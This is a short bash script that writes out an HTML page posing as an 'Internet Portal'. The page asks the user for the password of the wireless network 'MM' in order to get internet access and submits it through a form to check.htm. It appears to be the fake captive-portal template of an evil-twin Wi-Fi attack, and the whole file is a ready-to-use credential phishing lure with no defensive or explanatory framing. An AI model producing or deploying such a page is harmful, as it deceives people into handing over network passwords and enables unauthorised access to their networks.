#!/usr/bin/env bash
echo '<!DOCTYPE html>'
echo '<html>'
echo -e '	<head>'
echo -e '		<meta name="viewport" content="width=device-width"/>'
echo -e '		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>'
echo -e '		<title>Internet Portal</title>'
echo -e '		<link rel="stylesheet" type="text/css" href="portal.css"/>'
echo -e '		<script type="text/javascript" src="portal.js"></script>'
echo -e '	</head>'
echo -e '	<body>'
echo -e '		<div class="content">'
echo -e '			<form method="post" id="loginform" name="loginform" action="check.htm">'
echo -e '				<div class="title">'
echo -e '					<p>Wireless network, ESSID:</p>'
echo -e '					<span class="bold">MM</span>'
echo -e '				</div>'
echo -e '				<p>Enter your wireless network password to get internet access</p>'
echo -e '				<label>'
echo -e '					<input id="password" type="password" name="password" maxlength="63" size="20" placeholder="Password"/><br/>'
echo -e '				</label>'
echo -e '				<p>Show password <input type="checkbox" id="showpass"/></p>'
echo -e '				<input class="button" id="formbutton" type="button" value="Submit"/>'
echo -e '			</form>'
echo -e '		</div>'
echo -e '	</body>'
echo '</html>'
exit 0
